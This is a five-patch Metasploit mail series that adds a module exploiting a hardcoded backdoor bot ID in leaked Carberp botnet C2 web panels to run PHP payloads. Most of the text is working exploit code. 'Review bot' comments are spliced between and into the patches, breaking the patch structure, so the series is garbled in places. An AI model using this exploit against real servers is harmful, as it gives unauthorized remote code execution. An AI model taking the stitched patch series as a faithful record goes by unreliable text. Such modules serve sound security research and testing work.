From fe0e16183c2f930b21bb9c7e5d9c73198b306ed4 Mon Sep 17 00:00:00 2001
From: Brian Wallace
Date: Fri, 28 Jun 2013 14:47:13 -0700
Subject: [PATCH 1/5] Carberp backdoor eval PoC

---
 .../multi/http/carberp_backdoor_exec.rb | 93 +++++++++++++++++++
 1 file changed, 93 insertions(+)
 create mode 100644 modules/exploits/multi/http/carberp_backdoor_exec.rb

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
new file mode 100644
index 0000000000..8627bbd4b5
--- /dev/null
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
@@ -0,0 +1,93 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Carberp Web Panel C2 Backdoor Remote PHP Code Execution',
+ 'Description' => %q{
+ This module exploits backdoors that can be sighted all over the leaked
+ source code of the Carberp botnet C2 Web Panel.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'bwall(Brian Wallace) ', # msf module
+ 'connection(Luis Santana) ', # exploit reporting
+ 'Steven K' # discovery and reporting
+ ],
+ 'References' =>
+ [
+ ['URL', 'http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html']
+ ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Keys' => ['php'],
+ 'Space' => 10000,
+ 'DisableNops' => true
+ },
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ ['carberp', {}]
+ ],
+ 'DisclosureDate' => 'Jun 28 2013',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI',[true, "The path to the backdoor, often just index.php", "/index.php"]),
+ OptString.new('BOTID', [true, 'Hardcoded backdoor bot ID that can run PHP eval', 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV']),
+ ],self.class)
+ end
+
+ def check
+ uri = normalize_uri(target_uri.path.to_s)
+ confirm_string = rand_text_alpha(8)
+ cmd = "echo '#{confirm_string}';"
+ request_parameters = {
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'vars_post' =>
+ {
+ 'id' => datastore['BOTID'],
+ 'data' => Rex::Text.encode_base64(cmd.unpack('H*'))
+ }
+ }
+ shell = send_request_cgi(request_parameters)
+ if (shell and shell.body =~ /#{confirm_string}/)
+ return Exploit::CheckCode::Vulnerable
+ end
+ return Exploit::CheckCode::Safe
+ end
+
+ def http_send_command(cmd)
+ uri = normalize_uri(target_uri.path.to_s)
+ request_parameters = {
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'vars_post' =>
+ {
+ 'id' => datastore['BOTID'],
+ "data" => Rex::Text.encode_base64(cmd.unpack('H*'))
+ }
+ }
+ res = send_request_cgi(request_parameters)
+ end
+
+ def exploit
+ http_send_command(payload.encoded)
+ end
+end
From 9486364cc458966345dd24771d29669e082295b4 Mon Sep 17 00:00:00 2001
From: "(B)rian (Wall)ace"
Date: Fri, 28 Jun 2013 15:31:17 -0700
Subject: [PATCH 2/5] Added Steven K's email

---
 modules/exploits/multi/http/carberp_backdoor_exec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
index 8627bbd4b5..b38611404d 100644
--- a/modules/exploits/multi/http/carberp_backdoor_exec.rb
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [
 'bwall(Brian Wallace) ', # msf module
 'connection(Luis Santana) ', # exploit reporting
- 'Steven K' # discovery and reporting
+ 'Steven K ' # discovery and reporting
 ],
 'References' =>
 [
From b8cada9ab039fa5200ed3a19cc5f8a46a5b4a942 Mon Sep 17 00:00:00 2001
From: Brian Wallace
Date: Fri, 28 Jun 2013 22:44:23 -0700
Subject: [PATCH 3/5] Applied some refactoring to decrease line count

---
 .../exploits/multi/http/carberp_backdoor_exec.rb | 13 ++-----------
 1 file changed, 2 insertions(+), 11 deletions(-)

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
index 8627bbd4b5..1926904fae 100644
--- a/modules/exploits/multi/http/carberp_backdoor_exec.rb
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
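Review bot: `check` is not a passive probe: it pushes a PHP `echo` of a random marker through the backdoor and reports Vulnerable only if that marker is echoed back, so it executes code on the panel exactly as `exploit` does, and neither `Description` nor anything near `def check` says so. A comment above `def check` such as `# check is active: it runs a harmless echo through the backdoor and is as visible to the target as exploit` would tell operators what running the check actually does. The `BOTID` help text calls the value a hardcoded backdoor bot ID but nothing explains where it goes; a short comment on that option, `# sent as the 'id' POST field by http_send_command`, closes the gap. Style: the `TARGETURI` line mixes single and double quotes and lacks the space after `'TARGETURI',` that the `BOTID` line has.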
@@ -54,19 +54,9 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 
 def check
- uri = normalize_uri(target_uri.path.to_s)
 confirm_string = rand_text_alpha(8)
 cmd = "echo '#{confirm_string}';"
- request_parameters = {
- 'method' => 'POST',
- 'uri' => uri,
- 'vars_post' =>
- {
- 'id' => datastore['BOTID'],
- 'data' => Rex::Text.encode_base64(cmd.unpack('H*'))
- }
- }
- shell = send_request_cgi(request_parameters)
+ shell = http_send_command(cmd)
 if (shell and shell.body =~ /#{confirm_string}/)
 return Exploit::CheckCode::Vulnerable
 end
@@ -85,6 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 res = send_request_cgi(request_parameters)
+ return res
 end
 
 def exploit
From ec7c9b039a0ff4cfae1c4f6d4f74d8b60260e2e0 Mon Sep 17 00:00:00 2001
From: Brian Wallace
Date: Sat, 29 Jun 2013 09:45:22 -0700
Subject: [PATCH 4/5] Further refactoring requested

---
 modules/exploits/multi/http/carberp_backdoor_exec.rb | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
index f69a3ba203..64597acc38 100644
--- a/modules/exploits/multi/http/carberp_backdoor_exec.rb
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
@@ -57,10 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
 confirm_string = rand_text_alpha(8)
 cmd = "echo '#{confirm_string}';"
 shell = http_send_command(cmd)
- if (shell and shell.body =~ /#{confirm_string}/)
- return Exploit::CheckCode::Vulnerable
+ check_code = Exploit::CheckCode::Safe
+
+ if shell and shell.body.include?(confirm_string)
+ check_code = Exploit::CheckCode::Vulnerable
 end
- return Exploit::CheckCode::Safe
+
+ check_code
 end
 
 def http_send_command(cmd)
@@ -75,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 res = send_request_cgi(request_parameters)
- return res
+ res
 end
 
 def exploit
From d990c7f21f9360feb1d8360cd17e6f97fceb2e02 Mon Sep 17 00:00:00 2001
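Review bot: `return res` in the second hunk (`@@ -85,6 +75,7 @@`) is redundant: `res = send_request_cgi(request_parameters)` is already the last expression of `http_send_command`, so the response was the method's value before this line was added. The idiomatic ending drops the local altogether and finishes the method with `send_request_cgi(request_parameters)`. The same intermediate survives as the bare `res` in patch 4 and again in patch 5, whose context lines show the assignment followed directly by `end` even though patch 4's new side already placed `res` there; the differing `index` hashes suggest a rebase, so the final shape of that method is worth confirming. The start of `http_send_command` lies outside both hunks.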
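Review bot: The no-response case in the first hunk is still reported as Safe: when `http_send_command` returns nil (connection refused, timeout), `check_code` keeps its initial `Exploit::CheckCode::Safe`, so the operator is told the panel is not vulnerable when it was never actually observed. `return Exploit::CheckCode::Unknown unless shell` ahead of the `if` gives the accurate answer, after which the remainder collapses to `shell.body.include?(confirm_string) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe`. The new condition also uses `and`, whose low precedence is a well-known Ruby trap; `&&` is what is meant. The enclosing `check` method begins before this hunk.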
From: Brian Wallace
Date: Sat, 29 Jun 2013 09:46:36 -0700
Subject: [PATCH 5/5] Dat line

---
 modules/exploits/multi/http/carberp_backdoor_exec.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/multi/http/carberp_backdoor_exec.rb b/modules/exploits/multi/http/carberp_backdoor_exec.rb
index 64597acc38..77c1fd4eb1 100644
--- a/modules/exploits/multi/http/carberp_backdoor_exec.rb
+++ b/modules/exploits/multi/http/carberp_backdoor_exec.rb
@@ -78,6 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 res = send_request_cgi(request_parameters)
+ res
 end